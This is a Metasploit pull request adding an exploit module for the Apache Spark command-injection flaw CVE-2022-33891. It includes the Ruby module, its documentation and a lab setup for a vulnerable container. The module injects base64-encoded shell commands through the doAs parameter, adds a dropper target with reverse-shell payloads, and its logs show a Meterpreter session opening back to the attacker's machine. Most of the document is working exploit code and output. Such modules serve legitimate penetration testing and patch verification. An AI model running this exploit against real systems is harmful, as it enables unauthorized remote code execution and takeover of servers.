### PR TITLE
Added Apache Spark RCE - CVE-2022-33891

### DIFF
--- a/documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
+++ b/documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
@@ -1,0 +1,176 @@
+## Vulnerable Application
+
+This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`. 
+With an authentication filter, this checks whether a user has access permissions to view or modify the application. 
+If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. 
+A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. 
+
+This will result in arbitrary shell command execution as the user `Spark` is currently running as.
+
+This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1
+
+Installing a vulnerable version of Apache Spark is quite easy.
+
+To set the server up use the following docker-compose.yml file and follow the steps below:
+```
+version: '2'
+
+services:
+  spark:
+    image: docker.io/bitnami/spark:3.1.1
+    environment:
+      - SPARK_MODE=master
+      - SPARK_RPC_AUTHENTICATION_ENABLED=no
+      - SPARK_RPC_ENCRYPTION_ENABLED=no
+      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
+      - SPARK_SSL_ENABLED=no
+    ports:
+      - '8080:8080'
+```
+
+1. Create the docker-compose.yml in your preferred directory and run `docker-compose up`. Let the container spin up.
+1. In a new terminal, enter `sudo docker exec -it spark_spark_1 /bin/bash`
+1. In the container bash session, enter: `echo "spark.acls.enable true" >> conf/spark-defaults.conf`
+1. cat the contents of spark-defaults.conf to make sure it looks good.
+1. Exit the interactive bash shell and Ctrl-C your docker-compose process.
+1. Once the containers have powered down gracefully, rerun `docker-compose up`
+
+Once the server and application is up, it's vulnerable and you can access it on port 8080 for testing...
+
+## Verification Steps
+
+1. `use exploit/linux/http/apache_spark_rce_cve_2022_33891`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set LHOST <Address of Attacking Machine>`
+1. `exploit`
+1. You should get a shell or meterpreter as the `spark` user.
+
+## Options
+
+No specific options to be set.
+
+## Scenarios
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit with spark.acls.enable set to true
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[*] Perform sleep test of 10 seconds...
+[+] The target is vulnerable. Sleep was around 10 seconds [10.033867019]!
+[*] Exploiting...
+[*] Sending stage (40164 bytes) to 192.168.100.43
+[-] Meterpreter session 3 is not valid and will be closed
+[*] 192.168.100.43 - Meterpreter session 3 closed.
+[*] Sending stage (40168 bytes) to 192.168.100.43
+[*] Meterpreter session 4 opened (192.168.100.7:4444 -> 192.168.100.43:62618) at 2022-08-26 10:49:46 +0000
+
+meterpreter > sysinfo
+Computer     : 7a26a9fb7ce3
+OS           : Linux 5.10.104-linuxkit #1 SMP Thu Mar 17 17:08:06 UTC 2022
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid
+Server username: spark
+```
+
+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit WITHOUT the spark.acls.enable option
+
+Note: This version is vulnerable, however the `spark.acls.enable` option is not set, hence the vulnerable code will not be triggered.
+Response on POST payload request will be 200 instead of 403.
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(inux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The 192.168.100.43:8080 did not respond a 403 response. "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
+```
+
+## Limitations
+The check option to determine if the application is vulnerable is based on a 403 response and the successful execution of a `sleep 10` command.
+The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
+The sleep command execution in this case is therefore a pretty safe bet to check if the command is succesfully executed.
+This test works fine a LAN based setup where the timing for execution will be around 10 seconds.
+
+However, in a WAN based scenario, additional delays can be introduced such as network latency.
+To avoid false/negatives, the upper range is set to 14 seconds as buffer and contingency for unforeseen delays.
+
+Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.

--- a/documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
+++ b/documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
@@ -177,12 +177,8 @@ msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
 ```
 
 ## Limitations
-The check to determine if the application is vulnerable is based on a 403 response and the successful execution of a `sleep 10` command.
+The check to determine if the application is vulnerable is based on a 403 response and the execution of a randomized `sleep` command.
 The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
-The sleep command execution in this case is therefore a pretty safe bet to check if the command is succesfully executed.
-This test works fine a LAN based setup where the timing for execution will be around 10 seconds.
-
-However, in a WAN based scenario, additional delays can be introduced such as network latency.
-To avoid false/negatives, the upper range is set to 14 seconds as buffer and contingency for unforeseen delays.
+Timing the sleep command execution is therefore a pretty safe bet to check if the command injection is successful.
 
 Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.

--- a/documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
+++ b/documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
@@ -1,16 +1,28 @@
 ## Vulnerable Application
 
 This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
-The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`. 
-With an authentication filter, this checks whether a user has access permissions to view or modify the application. 
-If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. 
-A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. 
+The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`.
+With an authentication filter, this checks whether a user has access permissions to view or modify the application.
+The permission check is coded using a bash command shell and the unix id command that allows a malicious shell command injection.
 
-This will result in arbitrary shell command execution as the user `Spark` is currently running as.
+Ironically the `spark.acls.enable` configuration setting is designed to improve the security access within the Spark application,
+but unfortunately this configuration setting triggers the vulnerable code below.
+
+```
+private def getUnixGroups(username: String): Set[String] = {
+    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
+    // we need to get rid of the trailing "\n" from the result of command execution
+    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
+    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
+  }
+}
+```
+
+This will result in arbitrary shell command execution as the user `Spark`.
 
 This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1
 
-Installing a vulnerable version of Apache Spark is quite easy.
+Installing a vulnerable version of Apache Spark to test this vulnerability is quite easy.
 
 To set the server up use the following docker-compose.yml file and follow the steps below:
 ```
@@ -165,7 +177,7 @@ msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
 ```
 
 ## Limitations
-The check option to determine if the application is vulnerable is based on a 403 response and the successful execution of a `sleep 10` command.
+The check to determine if the application is vulnerable is based on a 403 response and the successful execution of a `sleep 10` command.
 The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
 The sleep command execution in this case is therefore a pretty safe bet to check if the command is succesfully executed.
 This test works fine a LAN based setup where the timing for execution will be around 10 seconds.

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -87,7 +87,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     print_status("Checking if #{peer} can be exploited!")
 
-    res = execute_command('testing')
+    res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")
 
     return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
 

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
   prepend Msf::Exploit::Remote::AutoCheck
 
   def initialize(info = {})
@@ -48,9 +49,23 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => 'unix',
               'Arch' => ARCH_CMD,
-              'Type' => :in_memory
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_python'
+              }
             }
           ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :dropper,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
         ],
         'CmdStagerFlavor' => ['printf'],
         'DefaultTarget' => 0,
@@ -91,21 +106,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
 
-    if res && res.code != 403
+    if res.code != 403
       return CheckCode::Safe("The #{peer} did not respond a 403 response.")
-    else
-      print_status('Perform sleep test of 10 seconds...')
-      t1 = Time.now
-      res = execute_command('sleep 10')
-      return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+    end
 
-      t2 = Time.now
-      delta = t2 - t1
-      if (8..14).include?(delta)
-        return CheckCode::Vulnerable("Sleep was around 10 seconds [#{delta}]!")
-      else
-        return CheckCode::Unknown('Sleep test of 10 seconds was not successful!')
-      end
+    print_status('Perform sleep test of 10 seconds...')
+    t1 = Time.now
+    res = execute_command('sleep 10')
+    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+
+    t2 = Time.now
+    delta = t2 - t1
+    if (8..14).include?(delta)
+      return CheckCode::Vulnerable("Sleep was around 10 seconds [#{delta}]!")
+    else
+      return CheckCode::Unknown('Sleep test of 10 seconds was not successful!')
     end
   end
 

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -118,7 +118,6 @@ class MetasploitModule < Msf::Exploit::Remote
     res, elapsed_time = Rex::Stopwatch.elapsed_time do
       execute_command("sleep #{sleep_time}")
     end
-    disconnect
 
     print_status("Elapsed time: #{elapsed_time} seconds.")
 

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -96,7 +96,9 @@ class MetasploitModule < Msf::Exploit::Remote
     else
       print_status('Perform sleep test of 10 seconds...')
       t1 = Time.now
-      execute_command('sleep 10')
+      res = execute_command('sleep 10')
+      return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+
       t2 = Time.now
       delta = t2 - t1
       if (8..14).include?(delta)

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -95,8 +95,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(target_uri.path, '/'),
       'data' => post_data
     })
-  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
-    return nil
+  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e
+   elog("A communication error occurs: #{e.message}", error: e)
   end
 
   def check

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -1,0 +1,117 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Apache Spark Unauthenticated Command Injection RCE',
+        'Description' => %q{
+          This module exploits an unauthenticated command injection vulnerability in Apache Spark.
+          Successful exploitation results in remote code execution under the context of the Spark application user.
+
+          The command injection occurs because Spark checks the group membership of the user passed
+          in the ?doAs parameter by using a raw Linux command.
+
+          It is triggered by a non-default setting called spark.acls.enable.
+          This configuration setting spark.acls.enable should be set true in the Spark configuration to make the application vulnerable for this attack.
+
+          Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1 are affected by this vulnerability.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability
+          'H00die Gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module
+        ],
+        'References' => [
+          ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure
+          ['URL', 'https://attackerkb.com/topics/5FyKBES4BL/cve-2022-33891'], # Analysis
+          ['CVE', '2022-33891']
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory
+            }
+          ],
+        ],
+        'CmdStagerFlavor' => ['printf'],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2022-07-18',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8080),
+        OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
+      ]
+    )
+  end
+
+  def execute_command(cmd, _opts = {})
+    b64 = Rex::Text.encode_base64(cmd)
+    post_data = "doAs=\`echo #{b64} | base64 -d | bash\`"
+
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/'),
+      'data' => post_data
+    })
+  rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT
+    return nil
+  end
+
+  def check
+    print_status("Checking if #{peer} can be exploited!")
+
+    res = execute_command('testing')
+
+    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+
+    if res && res.code != 403
+      return CheckCode::Safe("The #{peer} did not respond a 403 response.")
+    else
+      print_status('Perform sleep test of 10 seconds...')
+      t1 = Time.now
+      execute_command('sleep 10')
+      t2 = Time.now
+      delta = t2 - t1
+      if (8..14).include?(delta)
+        return CheckCode::Vulnerable("Sleep was around 10 seconds [#{delta}]!")
+      else
+        return CheckCode::Unknown('Sleep test of 10 seconds was not successful!')
+      end
+    end
+  end
+
+  def exploit
+    print_status('Exploiting...')
+    case target['Type']
+    when :in_memory
+      execute_command(payload.encoded)
+    end
+  end
+end

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -3,6 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'rex/stopwatch'
+
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -30,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'Kostya Kortchinsky', # Security researcher and discovery of the vulnerability
-          'H00die Gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Author & Metasploit module
         ],
         'References' => [
           ['URL', 'https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc'], # Disclosure
@@ -96,7 +98,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'data' => post_data
     })
   rescue Rex::ConnectionRefused, Rex::HostUnreachable, Rex::ConnectionTimeout, Errno::ETIMEDOUT => e
-   elog("A communication error occurs: #{e.message}", error: e)
+    elog("A communication error occurs: #{e.message}", error: e)
   end
 
   def check
@@ -104,24 +106,27 @@ class MetasploitModule < Msf::Exploit::Remote
 
     res = execute_command("echo #{Rex::Text.rand_text_alpha_lower(8..12)}")
 
-    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+    return CheckCode::Unknown('Did not receive a response from target.') unless res
 
     if res.code != 403
-      return CheckCode::Safe("The #{peer} did not respond a 403 response.")
+      return CheckCode::Safe('Target did not respond with a 403 response.')
     end
 
-    print_status('Perform sleep test of 10 seconds...')
-    t1 = Time.now
-    res = execute_command('sleep 10')
-    return CheckCode::Unknown("Didn't receive a response from #{peer}") unless res
+    sleep_time = rand(5..10)
+    print_status("Performing command injection test issueing a sleep command of #{sleep_time} seconds.")
 
-    t2 = Time.now
-    delta = t2 - t1
-    if (8..14).include?(delta)
-      return CheckCode::Vulnerable("Sleep was around 10 seconds [#{delta}]!")
-    else
-      return CheckCode::Unknown('Sleep test of 10 seconds was not successful!')
+    res, elapsed_time = Rex::Stopwatch.elapsed_time do
+      execute_command("sleep #{sleep_time}")
     end
+    disconnect
+
+    print_status("Elapsed time: #{elapsed_time} seconds.")
+
+    unless res && elapsed_time >= sleep_time
+      return CheckCode::Safe('Failed to test command injection.')
+    end
+
+    return CheckCode::Vulnerable('Successfully tested command injection.')
   end
 
   def exploit

--- a/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
+++ b/modules/exploits/linux/http/apache_spark_rce_cve_2022_33891.rb
@@ -114,6 +114,8 @@ class MetasploitModule < Msf::Exploit::Remote
     case target['Type']
     when :in_memory
       execute_command(payload.encoded)
+    when :dropper
+      execute_cmdstager(linemax: 1024) # set an appropriate :linemax dependent upon available space
     end
   end
 end


### PR DESCRIPTION
## Introduction

This module exploits a remote code execution vulnerability (CVE-2022-33891) of Apache Spark.
The Apache Spark UI offers the possibility to enable ACLs via the configuration option `spark.acls.enable`.
With an authentication filter, this checks whether a user has access permissions to view or modify the application.
The permission check is coded using a `bash` command shell and the unix `id` command that allows a malicious shell command injection.

Ironically the `spark.acls.enable` configuration setting is designed to improve the security access within the Spark application, but unfortunately this configuration setting triggers the vulnerable code below.

```
private def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
    // we need to get rid of the trailing "\n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
  }
}
```
This will result in arbitrary shell command execution as the user `Spark`.

This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/apache_spark_rce_cve_2022_33891`
- [ ] `set RHOSTS <TARGET HOSTS>`
- [ ] `set LHOST <Address of Attacking Machine>`
- [ ] `exploit`
- [ ] You should get a shell or meterpreter as the `spark` user.

```
msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
lhost => 192.168.100.7
msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
rhosts => 192.168.100.43
msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options

Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8080             yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the vulnerable instance
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (In-Memory)


msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > exploit

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.100.43:8080 can be exploited!
[*] Perform sleep test of 10 seconds...
[+] The target is vulnerable. Sleep was around 10 seconds [10.033867019]!
[*] Exploiting...
[*] Sending stage (40164 bytes) to 192.168.100.43
[-] Meterpreter session 3 is not valid and will be closed
[*] 192.168.100.43 - Meterpreter session 3 closed.
[*] Sending stage (40168 bytes) to 192.168.100.43
[*] Meterpreter session 4 opened (192.168.100.7:4444 -> 192.168.100.43:62618) at 2022-08-26 10:49:46 +0000

meterpreter > sysinfo
Computer     : 7a26a9fb7ce3
OS           : Linux 5.10.104-linuxkit #1 SMP Thu Mar 17 17:08:06 UTC 2022
Architecture : x64
Meterpreter  : python/linux
meterpreter > getuid
Server username: spark
```

Installing a vulnerable version of Apache Spark to test this vulnerability is quite easy.

To set the server up use the following docker-compose.yml file and follow the steps below:
```
version: '2'

services:
  spark:
    image: docker.io/bitnami/spark:3.1.1
    environment:
      - SPARK_MODE=master
      - SPARK_RPC_AUTHENTICATION_ENABLED=no
      - SPARK_RPC_ENCRYPTION_ENABLED=no
      - SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
      - SPARK_SSL_ENABLED=no
    ports:
      - '8080:8080'
```

1. Create the docker-compose.yml in your preferred directory and run `docker-compose up`. Let the container spin up.
1. In a new terminal, enter `sudo docker exec -it spark_spark_1 /bin/bash`
1. In the container bash session, enter: `echo "spark.acls.enable true" >> conf/spark-defaults.conf`
1. cat the contents of spark-defaults.conf to make sure it looks good.
1. Exit the interactive bash shell and Ctrl-C your docker-compose process.
1. Once the containers have powered down gracefully, rerun `docker-compose up`

Once the server and application is up, it's vulnerable and you can access it on port 8080 for testing...

## Limitations
The check to determine if the application is vulnerable is based on a 403 response and the successful execution of a randomized `sleep` command.
The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
Timing the sleep command execution is therefore a pretty safe bet to check if the command injection is successful.

Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.
